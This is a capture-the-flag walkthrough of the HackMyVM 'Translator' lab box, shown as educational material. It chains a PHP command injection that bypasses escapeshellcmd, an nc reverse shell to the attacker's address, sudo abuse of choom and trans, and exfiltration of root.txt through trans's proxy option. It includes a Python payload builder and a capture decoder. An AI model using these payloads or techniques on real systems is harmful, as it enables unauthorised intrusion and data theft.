NOTES ABOUT Translator

[ 2022-10-22 ] [ HackMyVM / Translator ]

Status: Rooted
Skills: Port Scanning, Command Injection, Sudo
Tools: nmap, ssh, gobuster, curl, nc, trans, choom

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.35

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 08:cf:50:b2:4f:41:43:c4:66:56:ce:96:b9:04:8c:77 (RSA)
| 256 40:b7:11:24:76:59:cd:e0:79:db:71:d1:39:29:d5:45 (ECDSA)
|_ 256 44:64:ba:b8:52:4f:ca:00:dd:3e:c3:28:71:6f:77:76 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0

GETTING IN

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u 10.0.2.35
/index.html (Status: 200) [Size: 290]
/translate.php (Status: 200) [Size: 20]


$ curl "http://10.0.2.35/translate.php?hmv=id"
Translated to:<br>rw
rw

$ curl "http://10.0.2.35/translate.php?hmv=id;rw"
Translated to:<br>rw;id
rw
uid=33(www-data) gid=33(www-data) groufs=33(www-data)

$ curl "http://10.0.2.35/translate.php?hmv=nc%20-c%20/bin/bash%2010.0.2.15%2080"
Translated to:<br>mx -x /yrm/yzhs 10.0.2.15 80
mx -x /yrm/yzts 10.0.2.15 80

$ curl "http://10.0.2.35/translate.php?hmv=a;mx%20-x%20/yrm/yzhs%2010.0.2.15%2080"

$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.35] 40590
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ELEVATING PRIVILEGES

WWW-DATA TO OCEAN

ls -la
total 24
drwxr-xr-x 2 www-data www-data 4096 Oct 23 01:42 .
drwxr-xr-x 3 root root 4096 May 11 10:25 ..
-rw-r--r-- 1 www-data www-data 24 May 11 10:29 hvxivg
-rw-r--r-- 1 www-data www-data 290 May 11 10:29 index.html
-rw-r--r-- 1 www-data www-data 10 Oct 23 01:42 tr
-rw-r--r-- 1 www-data www-data 258 May 11 10:29 translate.php

cat translate.php
<?php
$test = $_GET['hmv'];
$test = escapeshellcmd($test);
echo ("Translated to:");
echo "<br>";
$ultima_linea = system('echo '.$test.'| tr abcdefghijklmnopqrstuvwxyz zyxwvutsrqponmlkjihgfedcba');
$ulti = system('echo '.$ultima_linea.'| tr "php" "wtf"');
?>
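
Added example, not code from the box or the original writeup: a small Python model of the two pipelines above, used to build the payload that was sent by hand at the `a;mx -x ...` step. The bug is that escapeshellcmd() protects only the first system() call; $ultima_linea, the last line printed by the first pipeline, is spliced into the second command line unescaped. A payload that is atbash-encoded is harmless echo input in stage 1, gets decoded by the first tr, and its `;` is a live command separator when /bin/sh runs stage 2. The target host, the escapeshellcmd() approximation and the attacker address are assumptions taken from the writeup; the real fix would be to pass $ultima_linea through escapeshellarg() or to drop the second shell call entirely.

```python
"""Payload builder for the translate.php chain (added example, not the box's own code).

Server logic being modelled (translate.php above):
  stage 1: system('echo ' . escapeshellcmd($hmv) . '| tr a-z z-a')   -> last line = $ultima_linea
  stage 2: system('echo ' . $ultima_linea . '| tr "php" "wtf"')       -> $ultima_linea is NOT escaped
"""
import string
from urllib.parse import quote

LOWER = string.ascii_lowercase
# Same table as `tr abcdefghijklmnopqrstuvwxyz zyxwvutsrqponmlkjihgfedcba`.
# The mapping is an involution: applying it twice returns the original text.
ATBASH = str.maketrans(LOWER, LOWER[::-1])

# Characters PHP's escapeshellcmd() prefixes with a backslash (PHP manual). Quotes are
# only escaped when unpaired; this approximation escapes them always, which is fine
# for payloads that contain no quotes.
SHELL_META = set("#&;`|*?~<>^()[]{}$\\\x0a\xff'\"")


def atbash(text: str) -> str:
    """Mirror lowercase letters (a<->z, b<->y, ...). Digits, punctuation and uppercase pass through."""
    return text.translate(ATBASH)


def escapeshellcmd(text: str) -> str:
    """Approximation of PHP escapeshellcmd(): backslash every shell metacharacter."""
    return "".join("\\" + c if c in SHELL_META else c for c in text)


def shell_unescape(text: str) -> str:
    """What /bin/sh hands to echo: an unquoted backslash just makes the next character literal.
    (Backslash-newline is line continuation in sh; newlines are rejected before we get here.)"""
    out, i = [], 0
    while i < len(text):
        if text[i] == "\\" and i + 1 < len(text):
            out.append(text[i + 1])
            i += 2
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def stage1_output(hmv: str) -> str:
    """Last line printed by the first pipeline, i.e. the value of $ultima_linea."""
    if "\n" in hmv:
        raise ValueError("system() returns only the last output line; keep the payload to one line")
    return atbash(shell_unescape(escapeshellcmd(hmv)))


def stage2_command(hmv: str) -> str:
    """The exact command line /bin/sh receives in the second system() call."""
    return "echo " + stage1_output(hmv) + '| tr "php" "wtf"'


def build_payload(cmd: str, host: str = "10.0.2.35"):
    """Return (hmv value, full URL) that makes stage 2 execute `cmd`.

    'a;' gives echo a harmless argument; after decoding it is 'z;' and the semicolon,
    no longer escaped, terminates the echo so `cmd` runs as the next command.
    Ending `cmd` with ' #' comments out the trailing `| tr "php" "wtf"` so the
    command's output is not mangled (p->w, h->t).
    """
    if "\n" in cmd:
        raise ValueError("payload must be a single line")
    hmv = "a;" + atbash(cmd)
    return hmv, f"http://{host}/translate.php?hmv={quote(hmv, safe='')}"


if __name__ == "__main__":
    # Attacker listener address as used in the writeup (assumption).
    hmv, url = build_payload("nc -c /bin/bash 10.0.2.15 80")
    print("hmv value :", hmv)
    print("URL       :", url)
    print("stage 2   :", stage2_command(hmv))
```

Running the script prints the same `a;mx -x /yrm/yzhs 10.0.2.15 80` value that was sent with curl above, fully percent-encoded so `;`, `/` and `#` survive the URL, plus the command line stage 2 actually executes. stage2_command("a;rw") reproduces the earlier `id;rw` test: the shell sees `echo z;id| tr "php" "wtf"`, which is why `groups` came back as `groufs`.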

cat hvxivg | tr abcdefghijklmnopqrstuvwxyz zyxwvutsrqponmlkjihgfedcba
My password is *******

ls -laR /home
/home:
total 16
drwxr-xr-x 4 root root 4096 May 11 10:28 .
drwxr-xr-x 18 root root 4096 May 11 10:20 ..
drwxr-xr-x 2 india india 4096 May 11 10:32 india
drwxr-xr-x 3 ocean ocean 4096 May 11 10:31 ocean
[...]

OCEAN TO INDIA

$ ssh ocean@10.0.2.35
ocean@10.0.2.35's password: ******
ocean@translator:~$

ocean@translator:~$ cat user.txt
****************

ocean@translator:~$ sudo -l
Matching Defaults entries for ocean on translator:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ocean may run the following commands on translator:
(india) NOPASSWD: /usr/bin/choom

ocean@translator:~$ sudo -u india choom -n 0 /bin/bash
india@translator:/home/ocean$

INDIA TO ROOT

india@translator:~$ sudo -l
Matching Defaults entries for india on translator:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User india may run the following commands on translator:
(root) NOPASSWD: /usr/local/bin/trans

india@translator:~$ trans -h
Usage: trans [OPTIONS] [SOURCES]:[TARGETS] [TEXT]...
[...]
Networking options:
-x HOST:PORT, -proxy HOST:PORT
Use HTTP proxy on given port.
-u STRING, -user-agent STRING
Specify the User-Agent to identify as.
-4, -ipv4, -inet4-only
Connect only to IPv4 addresses.
-6, -ipv6, -inet6-only
Connect only to IPv6 addresses.
[...]
I/O options:
-i FILENAME, -input FILENAME
Specify the input file.
-o FILENAME, -output FILENAME
Specify the output file.
[...]

$ nc -lvnp 80 > proxy-translator

india@translator:~$ sudo /usr/local/bin/trans -i /root/root.txt -x 10.0.2.15:80
[ERROR] Null response.
[ERROR] Oops! Something went wrong and I can't translate it for you :(

ROOT FLAG IS THE q PARAM OF THE CAPTURED REQUEST, URL-DECODED (trans -i SENDS THE FILE AS THE TEXT TO TRANSLATE, AND -x ROUTES THAT REQUEST TO OUR LISTENER)

$ cat proxy-translator
GET http://translate.googleapis.com/translate_a/single?client=gtx&ie=UTF-8&oe=UTF-8&dt=bd&dt=ex&dt=ld&dt=md&dt=rw&dt=rm&dt=ss&dt=t&dt=at&dt=gt&dt=qca&sl=auto&tl=es&hl=es&q=***************************** HTTP/1.1
Host: translate.googleapis.com
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
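
Added example, not part of the original writeup: a Python helper that pulls the exfiltrated text out of a capture like the one above. With -x, trans talks plain HTTP to the proxy and puts the absolute Google Translate URL on the request line, so the file content is just the percent-encoded q parameter; the helper handles a capture holding more than one request and URL-decodes each q. The sample capture and the flag-like value in it are constructed for the example.

```python
"""Recover the text trans sent through a fake -x proxy (added example, not the box's code)."""
import sys
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for `nc -lvnp 80 > proxy-translator`; the q= content is made up.
SAMPLE_CAPTURE = (
    "GET http://translate.googleapis.com/translate_a/single?client=gtx&ie=UTF-8&oe=UTF-8"
    "&dt=bd&dt=t&sl=auto&tl=es&hl=es&q=example%7Broot-flag-here%7D%0A HTTP/1.1\r\n"
    "Host: translate.googleapis.com\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)


def request_lines(capture: str) -> list:
    """Request lines of every HTTP request in the capture, in order."""
    return [ln for ln in capture.splitlines() if ln.startswith(("GET ", "POST "))]


def query_param(request_line: str, name: str) -> str:
    """URL-decoded value of `name` from the absolute-URI request line a proxy receives."""
    parts = request_line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError(f"not an HTTP request line: {request_line!r}")
    # urlsplit handles the absolute form 'http://host/path?query'; parse_qs percent-decodes.
    query = parse_qs(urlsplit(parts[1]).query, keep_blank_values=True)
    if name not in query:
        raise KeyError(name)
    return query[name][0]


def q_values(capture: str) -> list:
    """One decoded q= value per request in the capture; the requests that lack q are skipped."""
    values = []
    for line in request_lines(capture):
        try:
            values.append(query_param(line, "q"))
        except KeyError:
            continue
    return values


if __name__ == "__main__":
    # Usage: python3 recover_q.py proxy-translator   (falls back to the constructed sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    else:
        data = SAMPLE_CAPTURE
    for value in q_values(data):
        print(value, end="")
```

Point it at the proxy-translator file written by nc and it prints the file trans read as root, newline included. Note that the request never left the box for Google: nc answered nothing, which is why trans reported "Null response", but the GET had already been written to disk.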
